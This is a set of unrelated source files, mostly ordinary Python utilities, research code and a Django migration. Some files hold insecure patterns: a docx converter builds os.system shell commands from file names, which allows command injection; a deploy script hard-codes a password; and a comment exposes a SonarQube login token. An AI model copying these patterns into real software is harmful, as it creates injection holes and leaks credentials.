        self.frame4 = tk.Frame(self.frame)
        self.button4L = ttk.Button(self.frame4, text='Left')
        self.button4R = ttk.Button(self.frame4, text='Right')
        self.button4R.configure(command=self.porte_R4)
        self.button4L.configure(command=self.porte_L4)
        self.display_4 = tk.Label(self.frame4, text=' #_4_# ')
        self.button4L.pack(side=tk.LEFT)
        self.button4R.pack(side=tk.RIGHT)
        self.display_4.pack(side=tk.RIGHT)
        self.frame4.pack(expand=True)
        # ----------------------(Buttons 3)---------------------- #
        self.frame3 = tk.Frame(self.frame)
        self.button3L = ttk.Button(self.frame3, text='Left')
        self.button3R = ttk.Button(self.frame3, text='Right')
        self.button3R.configure(command=self.porte_R3)
        self.button3L.configure(command=self.porte_L3)
        self.display_3 = tk.Label(self.frame3, text=' #_3_# ')
        self.button3L.pack(side=tk.LEFT)
        self.button3R.pack(side=tk.RIGHT)
        self.display_3.pack(side=tk.RIGHT)
        self.frame3.pack(expand=True)
        # ----------------------(Buttons 2)---------------------- #
        self.frame2 = tk.Frame(self.frame)
        self.button2L = ttk.Button(self.frame2, text='Left')
        self.button2R = ttk.Button(self.frame2, text='Right')
        self.button2R.configure(command=self.porte_R2)
        self.button2L.configure(command=self.porte_L2)
        self.display_2 = tk.Label(self.frame2, text=' #_2_# ')
        self.button2L.pack(side=tk.LEFT)
        self.button2R.pack(side=tk.RIGHT)
        self.display_2.pack(side=tk.RIGHT)
        self.frame2.pack(expand=True)
        # ----------------------(Buttons 1)---------------------- #
        self.frame1 = tk.Frame(self.frame)
        self.button1L = ttk.Button(self.frame1, text='Left')
        self.button1R = ttk.Button(self.frame1, text='Right')
        self.button1R.configure(command=self.porte_R1)
        self.button1L.configure(command=self.porte_L1)
        self.display_1 = tk.Label(self.frame1, text=' #_1_# ')
        self.button1L.pack(side=tk.LEFT)
        self.button1R.pack(side=tk.RIGHT)
        self.display_1.pack(side=tk.RIGHT)
        self.frame1.pack(expand=True)
        self.button_mauvaisePorte = ttk.Button(self.frame, text='l\'ascenceur n\'ouvre pas la bonne porte',command=self.mauvaisePorte)
        self.button_mauvaisePorte.pack(fill='x')
        self.button_bonnePorte = ttk.Button(self.frame, text='l\'ascenceur ouvre la bonne porte',command=self.bonnePorte)
        self.button_bonnePorte.pack(fill='x')
        # Initial state: left door on every floor, failure disabled.
        self.porte_L1()
        self.porte_L2()
        self.porte_L3()
        self.porte_L4()
        self.porte_L5()
        self.bonnePorte()
        self.frame.pack()
    def mauvaisePorte(self):
        """Enable the 'elevator opens the wrong door' failure."""
        global mauvaisePorte
        mauvaisePorte = True
        self.button_color(self.button_mauvaisePorte,self.button_bonnePorte)
    def bonnePorte(self):
        """Disable the 'wrong door' failure (normal behavior)."""
        global mauvaisePorte
        mauvaisePorte = False
        self.button_color(self.button_bonnePorte,self.button_mauvaisePorte)
    def button_color(self,buttonv,buttonuv):
        """Color `buttonv` as the chosen option and `buttonuv` as unchosen."""
        buttonv.configure(style="chosen_new.TButton")
        buttonuv.configure(style='unchosen_new.TButton')
    # porte_R<n> / porte_L<n>: select the right/left door for floor n and
    # recolor the corresponding button pair.
    def porte_R1(self):
        self.portes[0]=1
        self.button_color(self.button1R,self.button1L)
    def porte_L1(self):
        self.portes[0]=0
        self.button_color(self.button1L,self.button1R)
    def porte_R2(self):
        self.portes[1]=1
        self.button_color(self.button2R,self.button2L)
    def porte_L2(self):
        self.portes[1]=0
        self.button_color(self.button2L,self.button2R)
    def porte_R3(self):
        self.portes[2]=1
        self.button_color(self.button3R,self.button3L)
    def porte_L3(self):
        self.portes[2]=0
        self.button_color(self.button3L,self.button3R)
    def porte_R4(self):
        self.portes[3]=1
        self.button_color(self.button4R,self.button4L)
    def porte_L4(self):
        self.portes[3]=0
        self.button_color(self.button4L,self.button4R)
    def porte_R5(self):
        self.portes[4]=1
        self.button_color(self.button5R,self.button5L)
    def porte_L5(self):
        self.portes[4]=0
        self.button_color(self.button5L,self.button5R)
def main():
    """Build the Tk root window, start the 20 ms simulation timer and run
    the UI event loop."""
    root = tk.Tk()
    app = Lift(root)
    # Run the app's shutdown handler when the window is closed so the timer
    # thread does not keep the process alive.
    root.protocol("WM_DELETE_WINDOW", app.sortir)
    # Drive the simulation: call app.move every 0.02 s.
    Cron = MyTimer(0.02, app.move)
    Cron.start()
    root.mainloop()


if __name__ == '__main__':
    main()
|
991,470 | e80e86bbcb76b248356d1cd2dc70949bdc0b1f92 | #!/usr/bin/python3
import os
import zipfile, tempfile
import click
import shutil
@click.command()
@click.argument('input', nargs=1, type=click.Path(exists=True, file_okay=True, dir_okay=False))
def main(input):
    """A small script that converts docx files to lyx using pandoc and tex2lyx.

    A folder with the name of the input file is created, with a subfolder
    `media`, holding all images etc. from the docx file. The main folder will
    also contain a copy of the original file and the final lyx file.
    """
    path = os.path.abspath(input)
    name = os.path.splitext(os.path.basename(path))[0]
    p = os.path.join(os.getcwd(), name)
    # Pick a non-existing output directory: <name>, <name>-1, <name>-2, ...
    i = 1
    p1 = p
    while os.path.exists(p1):
        p1 = "{p}-{i}".format(p=p, i=i)
        i += 1
    os.mkdir(p1)
    os.mkdir(os.path.join(p1, "media"))
    # A .docx file is a zip archive; copy every entry under word/media/ into
    # the local media folder.
    with zipfile.ZipFile(path) as zf:
        for file in zf.namelist():
            # Path traversal defense copied from
            # http://hg.python.org/cpython/file/tip/Lib/http/server.py#l789
            words = file.split('/')
            dest = os.path.join(p1, "media")
            # len(words) > 2 guards against entries such as "word" or "word/"
            # which would raise IndexError or resolve to the media dir itself.
            if len(words) > 2 and words[0] == "word" and words[1] == "media":
                for word in words[2:]:
                    while True:
                        drive, word = os.path.splitdrive(word)
                        head, word = os.path.split(word)
                        if not drive:
                            break
                    if word in (os.curdir, os.pardir, ''):
                        continue
                    dest = os.path.join(dest, word)
                click.echo("{} -> {}".format(file, dest))
                # Context manager: the handle is closed even if reading the
                # archive entry raises (the original leaked it on error).
                with open(dest, 'wb') as of:
                    of.write(zf.read(file))
    newdoc = os.path.join(p1, os.path.basename(path))
    lyxfile = os.path.join(p1, name + ".lyx")
    texfile = os.path.join(p1, name + ".tex")
    shutil.copyfile(path, newdoc)
    # NOTE(review): file names are interpolated into shell commands; a name
    # containing a single quote would break these calls.
    os.system("pandoc -s -f docx -t latex -o '{of}' '{i}'".format(of=texfile, i=newdoc))
    os.system("tex2lyx '{i}' '{o}'".format(i=texfile, o=lyxfile))
    os.remove(texfile)
    os.system("convertwmf {dir}".format(dir=os.path.join(p1, "media")))
    click.echo(lyxfile)


if __name__ == '__main__':
    main()
|
991,471 | 6e67635ac77004e464ecbb494107ca87018c3d11 | from fabric.api import *
# Fabric deployment target: local Vagrant box.
# NOTE(review): credentials are hard-coded; acceptable for a throwaway
# Vagrant VM, but move to config/env vars for anything shared.
env.hosts = ['192.168.33.10']
env.user = 'vagrant'
env.password = 'vagrant'
def package():
    """Build a gzipped source distribution locally (dist/<fullname>.tar.gz)."""
    local('python setup.py sdist --format=gztar', capture=False)
def deploy():
    """Upload the sdist to the remote host, install it into the virtualenv,
    then clean up the temporary files on the server."""
    # Package name + version, e.g. "myapp-1.0".
    dist = local('python setup.py --fullname', capture=True).strip()
    # Upload the tarball built by package().
    put('dist/%s.tar.gz' % dist, '/tmp/myapp.tar.gz')
    run('mkdir /tmp/myapp')
    with cd('/tmp/myapp'):
        run('tar xzf /tmp/myapp.tar.gz')
    # Install with the virtualenv's interpreter so it lands in that env.
    with cd('/tmp/myapp/%s' % dist):
        run('/home/vagrant/test/bin/python setup.py install')
    # Remove the temporary upload/extraction artifacts.
    run('rm -rf /tmp/myapp /tmp/myapp.tar.gz')
    # run('touch /var/www/myapp.wsgi')
991,472 | 030213bef6a4611876018682579ab6b8af2f6aa1 | # -*- coding: utf-8 -*-
from zope.i18nmessageid import MessageFactory as ZMessageFactory
import warnings
_ = ZMessageFactory('plone')


def MessageFactory(*args, **kwargs):
    """Deprecated alias for the ``_`` message factory.

    BBB shim (remove in Plone 5.2): emits a DeprecationWarning and
    delegates to ``_``.
    """
    # Fix: the warning message misspelled "usual" as "usal".
    warnings.warn(
        "Name clash, now use '_' as usual. Will be removed in Plone 5.2",
        DeprecationWarning)
    return _(*args, **kwargs)
|
991,473 | 8a8f29658e6db4b0418dcf1a06d7ea5656d49ce9 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import itertools
import time
# Lazily generate every 3-digit numeric code: "000" .. "999".
passwd = ("".join(digits) for digits in itertools.product("0123456789", repeat=3))

# Print one candidate every 0.5 s; the loop ends when the space is exhausted.
# (The original drove the generator by hand with next()/StopIteration and
# shadowed the builtin `str` in the process.)
for candidate in passwd:
    time.sleep(0.5)
    print(candidate)
|
991,474 | ed3d3cebe7108b2054f8f2806767ca6152eac47b | #Author : Rohit
#license to : ABB Seden
'''56 sonar-scanner-4.6.0.2311-linux/bin/sonar-scanner -Dsonar.login=5b1bd1feaea303f4b6b40f68998849018b917332
57 sonar-scanner-4.6.0.2311-linux/bin/sonar-scanner -Dsonar.login=5b1bd1feaea303f4b6b40f68998849018b917332 -Dsonar.java.binaries=.
58 vim sonar-project.properties
59 sonar-scanner-4.6.0.2311-linux/bin/sonar-scanner -Dsonar.login=5b1bd1feaea303f4b6b40f68998849018b917332 -Dsonar.java.binaries=.
60 sonar-scanner-4.6.0.2311-linux/bin/sonar-scanner -Dsonar.login=5b1bd1feaea303f4b6b40f68998849018b917332 -Dsonar.java.binaries=. -Dsonar.projectKey=devopsschool -Dsonar.source=.
'''
import os
# NOTE(review): "hello word" is likely a typo for "hello world" — left as-is
# because it is runtime output.
print("hello word")
# Multi-line literal prints the nursery rhyme verbatim.
print('''Twinkle, twinkle, little star
How I wonder what you are
Up above the world so high
Like a diamond in the sky
Twinkle, twinkle little star
How I wonder what you are''')
|
991,475 | 57f88afe5d6918be27810c815b280682c77086b2 | # -*- coding: utf-8 -*-
"""
actions.py
:copyright: © 2019 by the EAB Tech team.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import shutil
import subprocess
from juniper.constants import DEFAULT_OUT_DIR
from juniper.io import (get_artifact, write_tmp_file, get_artifact_path)
def build_artifacts(logger, ctx):
    """
    Creates a .zip file for each one of the serverless functions defined in the given
    manifest definitions file. Each function must include a name, and the set of directories
    to be included in the artifact. As part of the packaging, if the given function
    has a definition of a requirements file, all the dependencies in that file will be
    included in the artifact.

    :param logger: The logger instance.
    :param ctx: The definition of the functions and global parameters as defined in the input file.
    """
    compose_fn = build_compose(logger, ctx)
    logger.debug(f'docker-compose.yml - {compose_fn}')
    try:
        # Must copy the bin directory to the client's folder structure. This directory
        # will be promtly cleaned up after the artifacts are built.
        os.makedirs('./.juni/bin', exist_ok=True)
        shutil.copy(get_artifact_path('package.sh'), './.juni/bin/')
        # Use docker as a way to pip install dependencies, and copy the business logic
        # specified in the function definitions.  `down` first clears any stale
        # containers from a previous run; `up` performs the actual packaging.
        # NOTE(review): return codes of the docker-compose calls are not
        # checked, so packaging failures pass silently — confirm intended.
        subprocess.run(["docker-compose", "-f", compose_fn, '--project-directory', '.', 'down'])
        subprocess.run(["docker-compose", "-f", compose_fn, '--project-directory', '.', 'up'])
    finally:
        # Always remove the scratch directory, even when packaging fails.
        shutil.rmtree('./.juni', ignore_errors=True)
def build_compose(logger, ctx):
    """
    Builds a docker-compose file with the lambda functions defined in the ctx.

    The definition of the lambda functions includes the name of the function as
    well as the set of dependencies to include in the packaging.

    :param logger: The logger instance.
    :param ctx: The yaml file that contains the info of the functions to package.
    :returns: The path of the temp file holding the docker-compose definition.
    """
    header = _get_compose_header(ctx)
    sections = _get_compose_sections(ctx)
    # Persist the assembled compose document and hand back its file name.
    return write_tmp_file('\n'.join((header, sections)))
def _get_compose_header(ctx):
    """
    Returns the static docker-compose header. Used when building the compose file.

    :param ctx: Unused; kept for signature symmetry with the other builders.
    """
    return get_artifact('compose_header.yml')
def _get_compose_sections(ctx):
    """
    Build the service entry for each one of the functions in the given context.

    Each docker-compose entry will depend on the same image and it's just a static
    definition that gets built from a template. The template is in the artifacts
    folder.

    :param ctx: The manifest context holding the `functions` mapping.
    :returns: All service entries joined by blank lines.
    """
    template = get_artifact('compose_entry.yml')
    functions = ctx.get('functions', {})
    return '\n\n'.join(
        _build_compose_section(ctx, template, fn_name, fn_def)
        for fn_name, fn_def in functions.items()
    )
def _build_compose_section(ctx, template, name, sls_function):
    """
    Builds a single docker-compose entry for a given serverless function. Includes
    the volumes mapping as well as the basic info of the function. Also, if the
    function has a given requirements file definition, the file will be included
    as part of the volumes mapping.

    :param ctx: The manifest context (used for the package output directory).
    :param template: The static template that defines the docker compose entry for the function
    :param name: The name of the serverless function
    :param sls_function: The actual object with the parameters needed to stamp the template
    :returns: The stamped docker-compose service entry as a string.
    """
    def get_vol(include):
        # rsplit tolerates bare file names (str.rindex raised ValueError when
        # the path had no '/') and no longer shadows the `name` parameter.
        base = include.rsplit('/', 1)[-1]
        return f' - {include}:/var/task/common/{base}'

    output_dir = ctx.get('package', {}).get('output', DEFAULT_OUT_DIR)
    volumes = [
        f' - {output_dir}:/var/task/dist',
        ' - ./.juni/bin:/var/task/bin',
    ] + [
        get_vol(include)
        for include in sls_function.get('include', [])
    ]
    # Mount the requirements file, if any, so the container can pip install it.
    reqs_path = sls_function.get('requirements')
    if reqs_path:
        volumes.append(f' - {reqs_path}:/var/task/common/requirements.txt')
    return template.format(name=name, volumes='\n'.join(volumes))
|
991,476 | ef86dcb590d54e95f8d6de436dde0575197447fd | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by wxk on 17-10-15 上午12:23
# Email="wangxk1991@gamil.com"
# Desc: 短信通知类
from src.Notify import Notify
class Sms(Notify):
    """SMS notification channel.

    Placeholder subclass: all behavior is currently inherited from Notify.
    """
    pass
991,477 | 3a69f68ba53cc795563304841dcf8b8049c15467 | # ___________________________________________________________________________
#
# Pyomo: Python Optimization Modeling Objects
# Copyright (c) 2008-2022
# National Technology and Engineering Solutions of Sandia, LLC
# Under the terms of Contract DE-NA0003525 with National Technology and
# Engineering Solutions of Sandia, LLC, the U.S. Government retains certain
# rights in this software.
# This software is distributed under the 3-clause BSD License.
# ___________________________________________________________________________
from pyomo.common.deprecation import deprecated
from pyomo.contrib.incidence_analysis.matching import maximum_matching
from pyomo.contrib.incidence_analysis.common.dulmage_mendelsohn import (
# TODO: The fact that we import this function here suggests it should be
# promoted.
_get_projected_digraph,
)
from pyomo.common.dependencies import networkx as nx
def _get_scc_dag_of_projection(graph, top_nodes, matching):
    """Return the DAG of strongly connected components of a bipartite graph,
    projected with respect to a perfect matching

    This data structure can be used, for instance, to identify the minimal
    subsystem of constraints and variables necessary to solve a given variable
    or constraint.

    :param graph: A bipartite NetworkX graph.
    :param top_nodes: One bipartite set of ``graph``.
    :param matching: Perfect matching mapping nodes to their partners.
    :returns: Tuple ``(scc_list, dag)`` where ``scc_list`` holds sets of top
        nodes (one set per SCC) and ``dag`` is a DiGraph on SCC indices.
    """
    nxc = nx.algorithms.components
    # _get_projected_digraph treats matched edges as "in-edges", so we
    # reverse the direction of edges here.
    dg = _get_projected_digraph(graph, matching, top_nodes).reverse()
    scc_list = list(nxc.strongly_connected_components(dg))
    n_scc = len(scc_list)
    # Map each projected node to the index of the SCC that contains it.
    node_scc_map = {n: idx for idx, scc in enumerate(scc_list) for n in scc}
    # Now we need to put the SCCs in the right order. We do this by performing
    # a topological sort on the DAG of SCCs.
    dag = nx.DiGraph()
    dag.add_nodes_from(range(n_scc))
    for n in dg.nodes:
        source_scc = node_scc_map[n]
        for neighbor in dg[n]:
            target_scc = node_scc_map[neighbor]
            # Only cross-SCC edges appear in the DAG; intra-SCC edges would
            # create self-loops and break the topological sort.
            if target_scc != source_scc:
                dag.add_edge(source_scc, target_scc)
    # Note that the matching is required to fully interpret scc_list (as it
    # only contains the "top nodes")
    return scc_list, dag
def get_scc_of_projection(graph, top_nodes, matching=None):
    """Return the topologically ordered strongly connected components of a
    bipartite graph, projected with respect to a perfect matching

    The provided undirected bipartite graph is projected into a directed graph
    on the set of "top nodes" by treating "matched edges" as out-edges and
    "unmatched edges" as in-edges. Then the strongly connected components of
    the directed graph are computed. These strongly connected components are
    unique, regardless of the choice of perfect matching. The strongly connected
    components form a directed acyclic graph, and are returned in a topological
    order. The order is unique, as ambiguities are resolved "lexicographically".

    The "direction" of the projection (where matched edges are out-edges)
    leads to a block *lower* triangular permutation when the top nodes
    correspond to *rows* in the bipartite graph of a matrix.

    Parameters
    ----------
    graph: NetworkX Graph
        A bipartite graph
    top_nodes: list
        One of the bipartite sets in the graph
    matching: dict
        Maps each node in ``top_nodes`` to its matched node

    Returns
    -------
    list of lists
        The outer list is a list of strongly connected components. Each
        strongly connected component is a list of tuples of matched nodes.
        The first node is a "top node", and the second is an "other node".

    Raises
    ------
    RuntimeError
        If the graph is not bipartite, the bipartite sets differ in size,
        or no perfect matching exists.
    """
    nxb = nx.algorithms.bipartite
    nxd = nx.algorithms.dag
    # --- validation: bipartite, square, perfectly matched ---
    if not nxb.is_bipartite(graph):
        raise RuntimeError("Provided graph is not bipartite.")
    M = len(top_nodes)
    N = len(graph.nodes) - M
    if M != N:
        raise RuntimeError(
            "get_scc_of_projection does not support bipartite graphs with"
            " bipartite sets of different cardinalities. Got sizes %s and"
            " %s." % (M, N)
        )
    if matching is None:
        # This matching maps top nodes to "other nodes" *and* other nodes
        # back to top nodes.
        matching = nxb.maximum_matching(graph, top_nodes=top_nodes)
    # A perfect matching contains both directions, hence 2*M entries.
    if len(matching) != 2 * M:
        raise RuntimeError(
            "get_scc_of_projection does not support bipartite graphs without"
            " a perfect matching. Got a graph with %s nodes per bipartite set"
            " and a matching of cardinality %s." % (M, (len(matching) / 2))
        )
    scc_list, dag = _get_scc_dag_of_projection(graph, top_nodes, matching)
    # Lexicographical topological sort makes the returned order unique.
    scc_order = list(nxd.lexicographical_topological_sort(dag))
    # The "natural" return type, here, is a list of lists. Each inner list
    # is an SCC, and contains tuples of nodes. The "top node", and its matched
    # "bottom node".
    ordered_node_subsets = [
        sorted([(i, matching[i]) for i in scc_list[scc_idx]]) for scc_idx in scc_order
    ]
    return ordered_node_subsets
def block_triangularize(matrix, matching=None):
    """Compute ordered partitions of the matrix's rows and columns that
    permute the matrix to block lower triangular form

    Subsets in the partition correspond to diagonal blocks in the block
    triangularization. The order is topological, with ties broken
    "lexicographically".

    Parameters
    ----------
    matrix: ``scipy.sparse.coo_matrix``
        Matrix whose rows and columns will be permuted
    matching: ``dict``
        A perfect matching. Maps rows to columns *and* columns back to rows.

    Returns
    -------
    row_partition: list of lists
        A partition of rows. The inner lists hold integer row coordinates.
    col_partition: list of lists
        A partition of columns. The inner lists hold integer column coordinates.

    .. note::

       **Breaking change in Pyomo 6.5.0**

       The pre-6.5.0 ``block_triangularize`` function returned maps from
       each row or column to the index of its block in a block
       lower triangularization as the original intent of this function
       was to identify when coordinates do or don't share a diagonal block
       in this partition. Since then, the dominant use case of
       ``block_triangularize`` has been to partition variables and
       constraints into these blocks and inspect or solve each block
       individually. A natural return type for this functionality is the
       ordered partition of rows and columns, as lists of lists.
       This functionality was previously available via the
       ``get_diagonal_blocks`` method, which was confusing as it did not
       capture that the partition was the diagonal of a block
       *triangularization* (as opposed to diagonalization). The pre-6.5.0
       functionality of ``block_triangularize`` is still available via the
       ``map_coords_to_block_triangular_indices`` function.

    """
    nxb = nx.algorithms.bipartite
    from_biadjacency_matrix = nxb.matrix.from_biadjacency_matrix
    M, N = matrix.shape
    if M != N:
        raise ValueError(
            "block_triangularize does not currently support non-square"
            " matrices. Got matrix with shape %s." % ((M, N),)
        )
    # from_biadjacency_matrix labels rows 0..M-1 and columns M..M+N-1.
    graph = from_biadjacency_matrix(matrix)
    row_nodes = list(range(M))
    sccs = get_scc_of_projection(graph, row_nodes, matching=matching)
    # Split each SCC's (row_node, col_node) pairs back into row and column
    # coordinates; column nodes are offset by M in the bipartite graph.
    row_partition = [[i for i, j in scc] for scc in sccs]
    col_partition = [[j - M for i, j in scc] for scc in sccs]
    return row_partition, col_partition
def map_coords_to_block_triangular_indices(matrix, matching=None):
    """Map each row and column coordinate of ``matrix`` to the index of its
    diagonal block in a block lower triangularization.

    Provides the pre-6.5.0 return type of ``block_triangularize``.
    """
    def _coord_to_block(partition):
        # Invert the ordered partition: coordinate -> index of its block.
        mapping = {}
        for block_index, block in enumerate(partition):
            for coord in block:
                mapping[coord] = block_index
        return mapping

    row_partition, col_partition = block_triangularize(matrix, matching=matching)
    return _coord_to_block(row_partition), _coord_to_block(col_partition)
@deprecated(
    msg=(
        "``get_blocks_from_maps`` is deprecated. This functionality has been"
        " incorporated into ``block_triangularize``."
    ),
    version="6.5.0",
)
def get_blocks_from_maps(row_block_map, col_block_map):
    """Convert coordinate-to-block-index maps into lists of per-block
    row and column coordinates (deprecated shim)."""
    block_indices = set(row_block_map.values())
    # Both maps must describe the same set of blocks.
    assert block_indices == set(col_block_map.values())
    n_blocks = len(block_indices)
    rows_by_block = [[] for _ in range(n_blocks)]
    cols_by_block = [[] for _ in range(n_blocks)]
    for row, block in row_block_map.items():
        rows_by_block[block].append(row)
    for col, block in col_block_map.items():
        cols_by_block[block].append(col)
    return rows_by_block, cols_by_block
@deprecated(
    msg=(
        "``get_diagonal_blocks`` has been deprecated. Please use"
        " ``block_triangularize`` instead."
    ),
    version="6.5.0",
)
def get_diagonal_blocks(matrix, matching=None):
    """Deprecated alias for :func:`block_triangularize`."""
    return block_triangularize(matrix, matching=matching)
|
991,478 | 348ae5edf29acf1293ee9ea5e00d26dcfa4b6c61 | # Generated by Django 3.1.6 on 2021-06-03 18:35
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: creates the BannerSeen model, which records
    one (address, banner, timestamp) row per banner view."""

    dependencies = [
        ('banner', '0002_auto_20210603_0815'),
    ]

    operations = [
        migrations.CreateModel(
            name='BannerSeen',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Viewer address, indexed for fast per-address lookups.
                ('address', models.CharField(db_index=True, max_length=50)),
                ('datetime', models.DateTimeField(auto_now_add=True)),
                # Deleting a banner cascades to its view records.
                ('banner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ips', to='banner.banner')),
            ],
        ),
    ]
|
991,479 | 49a3ae6630dcb9d34e9d86bc2469ba1ed9b582f5 | from pymongo import MongoClient
from requests import post
# Aggregate, per user, how many contacts live in each city, and report the
# counts to the city-statistics API.
client = MongoClient(API_mongoDB)  # database address (API_mongoDB defined elsewhere)
db = client['chatLog']
users = db['usercontacts']

for user in users.find():  # iterate the usercontacts collection, one user per document
    userPhone = user['userPhone']  # the user's phone number
    userContacts = user['userContacts']  # raw contact records to parse
    contactCity = []
    try:
        for contact in userContacts:
            # .get() handles records without a 'contactCity' key; skip
            # empty-string values just like the original checks did.
            city = contact.get('contactCity', '')
            if city:
                contactCity.append(city)
    except (TypeError, AttributeError):
        # userContacts was not a list of dicts; treat as "no cities"
        # (the original swallowed every exception here).
        pass
    # Count occurrences per city and build the "city=count|city=count" payload.
    countList = []
    for city in set(contactCity):
        countList.append("%s=%d" % (city, contactCity.count(city)))
    countStr = '|'.join(countList)
    d = {
        'mobile': userPhone,
        'list': countStr
    }
    url = API_City  # city-count reporting endpoint (defined elsewhere)
    r = post(url, data=d)
    print(userPhone, ':', r.content)
|
991,480 | 3bda0448e95d1b18a6920df6d75e34759192ff8e |
# Maps a canonical (lower-cased) UCLA place/organization name to a list of
# common abbreviations and aliases used when matching queries against it.
abbreviations_map = {
    'aca': [''],  # NOTE(review): empty alias looks like a placeholder — confirm
    'asme': ['american society of mechanical engineers'],
    'ackerman union': ['au', 'ackerman'],
    'afrikan student union': ['asu'],
    'alpha gamma omega ucla': ['ago'],
    'alpha kappa psi - ucla alpha upsilon chapter': ['akp'],
    'alpha tau delta - gamma chapter': ['atd'],
    'american indian studies center library': ['aiscl', 'aisc'],
    'anderson school of management': ['anderson'],
    'architecture & urban design': ['aud'],
    'ashe student health center': ['ashe', 'ashe center'],
    'asian american studies center library': ['aascl', 'aasc'],
    'asian pacific coalition': ['apc'],
    'bj\'s restaurant and brewhouse': ['bj'],
    'boelter hall': ['bh'],
    'bplate dining hall': ['bplate'],
    'brain research institute': ['bri'],
    # 'breath la' deliberately covers a common misspelling.
    'breathe los angeles at ucla': ['breathe la', 'breath la'],
    'bruin spacecraft group': ['bruinspace', 'bruin space', 'bsg'],
    'cafe 1919': ['1919'],
    'coco fresh tea & juice westwood': ['coco'],
    'creative labs': ['cl'],
    'delta sigma pi': ['dsp'],
    'design media arts': ['desma'],
    'doris stein eye research center': ['dserc'],
    'east asian library': ['eal'],
    'english reading room': ['grace m. hunt memorial english reading room ', 'err'],
    'facilities management building': ['fmb', 'fm'],
    'fellowship for international service & health - fish': ['fish'],
    'film & television archive': ['arsc'],
    'foshay learning center': ['flc'],
    'friends of the semel institute for neuroscience and human behavior': ['friends of npi'],
    'gamma rho lambda - zeta chapter at ucla': ['grl'],
    'gonda (goldschmied) neuroscience and genetics research center': ['gonda'],
    'gonda family library': ['gfl'],
    'humanities building ucla': ['kaplan', 'kaplan hall', 'kaplan building'],
    'international student association / isa at ucla': ['isa'],
    'iranian student group at ucla': ['isg', 'isg at ucla'],
    'james west alumni center aka jwac': ['jwac'],
    'latino business student association at ucla': ['lbsa'],
    'law student bar association': ['lsba', 'sba'],
    'learning resource center': ['lrc'],
    'los angeles': ['la'],
    'los angeles ski and board club': ['lasbc'],
    'macdonald medical research laboratory': ['mmrl', 'mrl'],
    'muslim student association at ucla': ['msa'],
    'near eastern languages & cultures': ['nelc'],
    'new student & transition programs': ['nstp'],
    'phi delta theta - ucla': ['pdt'],
    'phi kappa sigma ucla': ['pks'],
    'phi sigma rho': ['psr'],
    'pi kappa phi ucla': ['pkp'],
    'reed neurological research center': ['rnrc'],
    'rendezvous': ['rende'],
    'rocco\'s tavern': ['roccos', 'rocco\'s'],
    'spear - samahang pilipino education and retention': ['spear'],
    'science and technology research building': ['strb'],
    'semel institute for neuroscience and human behavior': ['semel'],
    'sigma alpha mu at ucla': ['sam'],
    'students with dependents program at the ucla bruin resource center': ['swd'],
    'student committee for the arts at ucla': ['sca'],
    'the association of ucla gamers - augment': ['augment'],
    'ucla center for brazilian studies': ['lcbs', 'cbs'],
    'ucla community programs office': ['cpo'],
    'ucla engineering graduate students association': ['egsa'],
    'ucla institute of the environment and sustainability': ['ioes'],
    'ucla intergroup relations program (igr)': ['igr'],
    'ucla kappa alpha theta': ['kat'],
    'ucla kinross recreation center (krec)': ['krec'],
    'ucla mindful awareness research center': ['marc'],
    'ucla pi beta phi': ['pbp'],
    'ucla police department': ['ucpd'],
    'ucla undergraduate research center-humanities, arts, and social sciences': ['ucla ugresearch', 'ugr'],
    'undergraduate astronomical society': ['uas'],
    'undocumented student program': ['usp'],
    'westwood branch - los angeles public library': ['lapl'],
    'writing success program at ucla': ['wsp']
}
991,481 | b677a829d1b0e1ae83713fc7db683ee16a5ca22e | import argparse
import cv2
import numpy as np
import torch
from facenet_pytorch.models.mtcnn import MTCNN
from omegaconf import OmegaConf
from tqdm import tqdm
import time
from pathlib import Path
from experiment import HairClassifier
from transforms.transform import get_infer_transform
from utils.infer_utils import crop_faces
# Test-time augmentation: each detected face is cropped at several scales and
# the per-crop predictions are aggregated with a max (see "TTA aggregation" below).
SCALE = [1.2, 1.25, 1.3, 1.5] # TTA
# Minimum crop edge in pixels (referenced only by the commented-out size filter below).
MIN_CROP_SIZE = 80
PATH_TO_IMAGES = "/home/malchul/work/projects/hair_classifier/val_images"
# Image extensions picked up when scanning the eval folder.
FORMAT_FILES = ['.png', '.jpg', '.jpeg']

parser = argparse.ArgumentParser('Detect faces on image')
parser.add_argument('--model_path',
                    default='./pretrained/shufflenetv2_epoch_94_f1_score=0.973.ckpt')
parser.add_argument('--is_quant', action='store_true', help='if model is quantized, pass this argument')
parser.add_argument('--eval_folder', help='path to eval folder with images')
parser.add_argument('--output_data', default='./result.csv', help='path to output file')
parser.add_argument('--dump_images', default=None, help='dump images for debug')
parser.add_argument('--is_cpu', action='store_true')
args = parser.parse_args()

# Create the debug-dump directory up front so per-image writes cannot fail on it.
if args.dump_images:
    output_path = Path(args.dump_images)
    output_path.mkdir(exist_ok=True)

if __name__ == '__main__':
    # Face detector; classifier config is read from the project-local YAML.
    detector = MTCNN()
    config = OmegaConf.load('configs/main_config.yml')
    num_classes = config.model.num_classes
    print('loading model')
    if not args.is_quant:
        # Regular (non-quantized) Lightning checkpoint.
        model = HairClassifier.load_from_checkpoint(args.model_path, strict=False)
        model.eval()
        if not args.is_cpu:
            model = model.cuda()
    else:
        # TorchScript quantized model; warm it up with a few dummy forward passes.
        model = torch.jit.load(args.model_path)
        model.eval()
        for _ in range(10):
            model.dequant(
                model(model.quant(torch.rand(1, 3, config.datasets.train.load_size, config.datasets.train.load_size))))
    print('loading complete')
    # Recursively collect all images with the accepted extensions, sorted for determinism.
    images_folder = Path(args.eval_folder)
    filenames = []
    for ext in FORMAT_FILES:
        filenames.extend(images_folder.rglob('*' + ext))
    filenames = sorted(list(map(str, filenames)))
    transforms = get_infer_transform(config.datasets.train.load_size)
    result = []
    for file_id, filename in tqdm(list(enumerate(filenames))):
        # OpenCV loads BGR; the model pipeline expects RGB.
        frame = cv2.imread(filename)
